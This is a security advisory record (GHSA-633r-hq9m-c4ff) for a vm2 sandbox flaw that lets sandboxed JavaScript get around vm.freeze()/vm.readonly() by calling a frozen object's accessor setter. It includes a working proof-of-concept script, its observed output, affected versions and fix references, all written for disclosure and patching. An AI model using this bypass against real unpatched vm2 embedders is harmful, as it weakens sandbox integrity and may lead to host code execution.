{"id":"GHSA-633r-hq9m-c4ff","summary":"vm2: vm.freeze()/vm.readonly() bypass via accessor descriptor","details":"### Summary\nUntrusted JavaScript running inside `new VM().run()` / `new NodeVM().run()` can bypass `vm.freeze()` / `vm.readonly()` and mutate a host object the embedder explicitly marked read-only - the documented contract is \"prevent sandboxed scripts from adding, changing, or deleting properties\". If the frozen host object has an accessor (get/set) own-property, the sandbox can read the host setter back out via `Object.getOwnPropertyDescriptor()` and call it directly; the call lands in `BaseHandler.apply` which unwraps the readonly proxy to the raw host object and runs the host setter against it. No non-default `VM`/`NodeVM` options are required; the only precondition is that the embedder froze an object whose shape includes an accessor property. A second route to the same sink exists via `__lookupSetter__`.\n\n### PoC\n```js\n// poc.js\n'use strict';\nconst { VM } = require('vm2');\n\nlet _level = 'safe';\nconst hostConfig = Object.defineProperty({}, 'level', {\n  get() { return _level; },\n  set(v) { _level = String(v); },\n  enumerable: true, configurable: true,\n});\n\nconst vm = new VM();\nvm.freeze(hostConfig, 'cfg');\n\n// Baseline - documented barriers hold:\nvm.run(`cfg.level = 'via-set';`);\nvm.run(`try { Object.defineProperty(cfg, 'level', {value: 'via-dP'}); } catch (e) {}`);\nconsole.log('after [[Set]]/defineProperty:', _level);   // → \"safe\"\n\n// Bypass - sandbox mutates host via accessor descriptor:\nvm.run(`\n  const d = Object.getOwnPropertyDescriptor(cfg, 'level');\n  d.set.call(cfg, 'PWNED');\n`);\nconsole.log('after getOwnPropertyDescriptor→set.call:', _level);   // → \"PWNED\"\n\n// Variant - same sink via __lookupSetter__:\nvm.run(`cfg.__lookupSetter__('level').call(cfg, 'PWNED-2');`);\nconsole.log('after __lookupSetter__:', _level);   // → \"PWNED-2\"\n```\n\n```sh\nnode poc.js\n```\n\nObserved output:\n\n```\nafter [[Set]]/defineProperty: safe\nafter getOwnPropertyDescriptor→set.call: PWNED\nafter __lookupSetter__: PWNED-2\n```\n\nThe first line shows `ReadOnlyHandler`'s documented traps work; the next two show the sandbox mutated the host-side `_level` despite `vm.freeze()`.\n\n\n\n### Impact\nA sandboxed script can mutate any accessor-backed property on any host object the embedder exposed via `vm.freeze()` / `vm.readonly()`, defeating the read-only contract. Data properties are not affected (`ReadOnlyHandler.set` / `.defineProperty` block those correctly). This is not a generic sandbox escape on its own; severity depends on what the embedder froze. If a frozen object's setter feeds into host control flow (e.g. `set scriptPath(v)`, `set handler(fn)`), this becomes a stepping-stone to host code execution in that embedder.\n\n**Preconditions**: embedder calls `vm.freeze()`/`vm.readonly()` on a host object that has at least one accessor own-property. Default `VM`/`NodeVM` options otherwise.\n**Blast radius**: integrity of the specific frozen host object(s); downstream impact is embedder-defined.\n**Persistence**: as persistent as the host object (typically process-lifetime).","aliases":["CVE-2026-92949"],"modified":"2026-10-01T15:45:06.739431237Z","published":"2026-10-01T15:35:25Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-10-01T15:35:25Z","nvd_published_at":null,"cwe_ids":["CWE-471","CWE-693"],"severity":"MODERATE"},"references":[{"type":"WEB","url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-633r-hq9m-c4ff"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-92949"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/commit/d6ef73bd46488102dae8f4bc35f3f3c0eba2ea64"},{"type":"PACKAGE","url":"https://github.com/patriksimek/vm2"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.7"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/vm2-3.9.6-before-3.11.7-sandbox-bypass-via-accessor-descriptor"}],"affected":[{"package":{"name":"vm2","ecosystem":"npm","purl":"pkg:npm/vm2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.9.6"},{"fixed":"3.11.7"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.11.6","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-633r-hq9m-c4ff/GHSA-633r-hq9m-c4ff.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N"}]}